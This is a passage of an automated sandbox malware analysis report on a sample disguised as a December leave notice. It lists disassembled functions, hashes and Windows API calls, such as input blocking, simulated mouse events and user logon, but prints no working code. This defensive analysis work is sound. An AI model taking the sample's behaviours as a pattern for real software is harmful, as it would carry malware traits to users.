                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 0a8c975bab3e43d6ad8fb45cacbb2e7700bbaf7fbd26bad520e2266310beb8eb
                                                      • Instruction ID: 1bf63db517e5f91a814ea69417e7af786194d2c7c101e784e48533bafa391784
                                                      • Opcode Fuzzy Hash: 0a8c975bab3e43d6ad8fb45cacbb2e7700bbaf7fbd26bad520e2266310beb8eb
                                                      • Instruction Fuzzy Hash: C7A25971E04219CFDB25DF58C8807EDBBB1BF48354F2581A9E859AB391D7349E81EB80
                                                      Function 00FAD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cdfe6eec046aeff0c6c97b025068ba95e4917b0d998a22e7fe7a0832665d8af8
                                                      • Instruction ID: ba5de9ad07e515ff81b39329707235c9066722cd9f6bf0c07ab8a3d825d00570
                                                      • Opcode Fuzzy Hash: cdfe6eec046aeff0c6c97b025068ba95e4917b0d998a22e7fe7a0832665d8af8
                                                      • Instruction Fuzzy Hash: AC320372D29F014DD7239534D822336A298AFB73D4F25D727F85AB5E9AEB2DC4835200
                                                      Function 00F896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID:
                                                      • API String ID: 674341424-0
                                                      • Opcode ID: cb8bc8eaa8e5e9e496f26242250befe70cfc0a924d5dbbba410cf52cfe77c9d7
                                                      • Instruction ID: 45485145373c3f924a2b012c268e9868d2249f90015843714d1ad237c4d30d96
                                                      • Opcode Fuzzy Hash: cb8bc8eaa8e5e9e496f26242250befe70cfc0a924d5dbbba410cf52cfe77c9d7
                                                      • Instruction Fuzzy Hash: 2722CF716083059FD724EF14C891BAFB7E4EF84310F14491DF99A972A1DBB5E904EB82
                                                      Function 00FB038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e96b3a5b359109c2a7ed8185533df9c1c69fc7f0842b70f6bfe304a4fc94e05
                                                      • Instruction ID: 5d115c7a394ca58a469bbdb04fce585a097dc2c6fbed6934d64a345d1e50a601
                                                      • Opcode Fuzzy Hash: 4e96b3a5b359109c2a7ed8185533df9c1c69fc7f0842b70f6bfe304a4fc94e05
                                                      • Instruction Fuzzy Hash: 5DB1D030D2AF414DD22396398831336B65CAFFB2D5F91D71BFC5A78D56EB2A85834280
                                                      Function 00FCB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __time64.LIBCMT ref: 00FCB6DF
                                                        • Part of subcall function 00FA344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FCBDC3,00000000,?,?,?,?,00FCBF70,00000000,?), ref: 00FA3453
                                                        • Part of subcall function 00FA344A: __aulldiv.LIBCMT ref: 00FA3473
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      • Opcode ID: dcce3ef31d578fb830ef12e3e61f0db786ca9cb153fdcc4adee57867163a2c8f
                                                      • Instruction ID: 6de861d51ac98c5797f249fa885876b2787609ad9b87d16895a49499dc9923ae
                                                      • Opcode Fuzzy Hash: dcce3ef31d578fb830ef12e3e61f0db786ca9cb153fdcc4adee57867163a2c8f
                                                      • Instruction Fuzzy Hash: 1121AF766345118BC729CF28C482B92B7E5EB95321B248E6DE4E5CF2C0CB78B905DB54
                                                      Function 00FD6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00FD6ACA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 450a5183acc3546c714cce6c9c90b01479b7bb92af8e32c6436502fe00e76717
                                                      • Instruction ID: 4b450262973db527cdc86e7a1187dc964904c27ce88e7ba96ae51c2afef93af3
                                                      • Opcode Fuzzy Hash: 450a5183acc3546c714cce6c9c90b01479b7bb92af8e32c6436502fe00e76717
                                                      • Instruction Fuzzy Hash: 8AE012362102046FD740EB99D80499AB7EDAF68761F058416E985D7391DAB4E8049BA0
                                                      Function 00FC74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FC750A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: bd6848bc04b66c24635b9425c5f397b8d2fb99a03fbfbede56ac9ef6c3d3a7c4
                                                      • Instruction ID: 9ed2976000c09526b216474f8214498e0ddeec7debdebe67830d1b5221e7f320
                                                      • Opcode Fuzzy Hash: bd6848bc04b66c24635b9425c5f397b8d2fb99a03fbfbede56ac9ef6c3d3a7c4
                                                      • Instruction Fuzzy Hash: 93D09EA556C747B9EC2D67649E1BFB71508F300791FD8894D7603D90C0A8D57D05B931
                                                      Function 00FBB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FBAD3E), ref: 00FBB124
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 914512e1c8bb02c9ee99e32fc84bd461291024ff97428e3ca46f40ec7dec23e5
                                                      • Instruction ID: 703aa1d2b864a61011a648030acf3fc587571055d426d462a3cbdb5cf3830b91
                                                      • Opcode Fuzzy Hash: 914512e1c8bb02c9ee99e32fc84bd461291024ff97428e3ca46f40ec7dec23e5
                                                      • Instruction Fuzzy Hash: FBD05E320A460EAEDF028FA4DC02EAE3F6AEB04700F408110FA15C5090C676D531AB60
                                                      Function 00FFB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: 13501386d8f91204b3161feb76cfd4ebc2dfb636f142d7fa007677a5238125db
                                                      • Instruction ID: e1ec35d003909116a4b83f4cc6546c046dd6a53089d64bf6d7487a313c30aea8
                                                      • Opcode Fuzzy Hash: 13501386d8f91204b3161feb76cfd4ebc2dfb636f142d7fa007677a5238125db
                                                      • Instruction Fuzzy Hash: 45C04CF240014DDFD752CBC0C944AEEB7BCAB04301F104091A249F1110D7749B459B72
                                                      Function 00FA8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FA818F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 1e2805994732087e863d51a9c34203be0038d97dcbb17237d91f00620f7080e8
                                                      • Instruction ID: f052f516f995d771f7912fa22928e59b650c7df0b1a756c4d594af3b80940990
                                                      • Opcode Fuzzy Hash: 1e2805994732087e863d51a9c34203be0038d97dcbb17237d91f00620f7080e8
                                                      • Instruction Fuzzy Hash: C3A0113000020CAB8F022BC2E8088883F2CEA002A0B008020F80C000208B23A820ABA0
                                                      Function 00F8E3B0 Relevance: .5, Instructions: 540COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0912f314eef05dba9295e5a71654bc0e0230a667f1f74176c64b07ba220a69d6
                                                      • Instruction ID: ff4d7e11292bed5a005ddf0e06c46af2b637e8565246ceb4657e4acde0ffd917
                                                      • Opcode Fuzzy Hash: 0912f314eef05dba9295e5a71654bc0e0230a667f1f74176c64b07ba220a69d6
                                                      • Instruction Fuzzy Hash: 4222AE75E0420A8FDB24EF58C840BFEB7B0FF14324F188069D95A9B351E335A945EB91
                                                      Function 00F893F0 Relevance: .5, Instructions: 531COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fee0df926fc458aab54371e4216626e56400b0d2d347ce7a1acfffc71e856c0e
                                                      • Instruction ID: 8599ab952f0d6fad9b7e86e16c9d48f3da46be95d39685dc2c7918776ee5fdcb
                                                      • Opcode Fuzzy Hash: fee0df926fc458aab54371e4216626e56400b0d2d347ce7a1acfffc71e856c0e
                                                      • Instruction Fuzzy Hash: 8C127B71A00609EBDF14EFA5D981AFEB7F5FF48300F148529E406E7254EB3AA911EB50
                                                      Function 00F8AF50 Relevance: .5, Instructions: 514COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3728558374-0
                                                      • Opcode ID: 8871f9e326169ec353590474ba004eab5a1fd5a53a71e6434e8a8d43e289bd01
                                                      • Instruction ID: a28021a63846f3cbbe4764ddd69456e04477c0cffa0aa4c042876758df6eb54e
                                                      • Opcode Fuzzy Hash: 8871f9e326169ec353590474ba004eab5a1fd5a53a71e6434e8a8d43e289bd01
                                                      • Instruction Fuzzy Hash: F902C270E00109DBDF14EF68D981ABEB7B5FF44300F108069E906DB2A5EB39DA15EB91
                                                      Function 00FA02A4 Relevance: .3, Instructions: 345COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                      • Instruction ID: bfdd82a7adc6a3fb6fbe6e00431a5e765c0ae511e47c05629c5703e3f2a3a7f4
                                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                      • Instruction Fuzzy Hash: 94C1C772A051930AEF2D8639D43453EFAA15EA37B531A076DD8B3CB5D5EF20C528F620
                                                      Function 00FA06D9 Relevance: .3, Instructions: 341COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                      • Instruction ID: 1a67cf590437780ae97bf5a189d0eb6a6db837c2e150f7808c5577c6ef0bf09f
                                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                      • Instruction Fuzzy Hash: B1C1B073A051930AEF2D463AD43453EBBA15EA3BB131A076DD4B3CB5D5EF20D528E620
                                                      Function 00F9FA57 Relevance: .3, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 4a642c2833aa2ce3f3272ee3ad15351213553298f9aad0fe6bc2c6c4c67ec36e
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: CEC19232A0909309FF6D463AC47453EBBA15AA2BB531A077DD4B3CB5D5EF20C56CE620
                                                      Function 00FDA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FDA2FE
                                                      • DeleteObject.GDI32(00000000), ref: 00FDA310
                                                      • DestroyWindow.USER32 ref: 00FDA31E
                                                      • GetDesktopWindow.USER32 ref: 00FDA338
                                                      • GetWindowRect.USER32(00000000), ref: 00FDA33F
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FDA480
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FDA490
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA4D8
                                                      • GetClientRect.USER32(00000000,?), ref: 00FDA4E4
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FDA51E
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA540
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA553
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA55E
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FDA567
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA576
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FDA57F
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA586
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FDA591
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA5A3
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0100D9BC,00000000), ref: 00FDA5B9
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FDA5C9
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FDA5EF
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FDA60E
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA630
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA81D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 9dbad7030394233035a608cafcfd1c8609714bd61be9696557c9bb4b50aa223e
                                                      • Instruction ID: 9c7fd03e7c33a1bd37017e771297e638c36d9a40c18b5c084764bda916ad209e
                                                      • Opcode Fuzzy Hash: 9dbad7030394233035a608cafcfd1c8609714bd61be9696557c9bb4b50aa223e
                                                      • Instruction Fuzzy Hash: 95029F75A00204EFDB25DFA4CD89EAE7BBAFF48310F048119F915AB294C779AD41DB60
                                                      Function 00FED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FED2DB
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FED30C
                                                      • GetSysColor.USER32(0000000F), ref: 00FED318
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00FED332
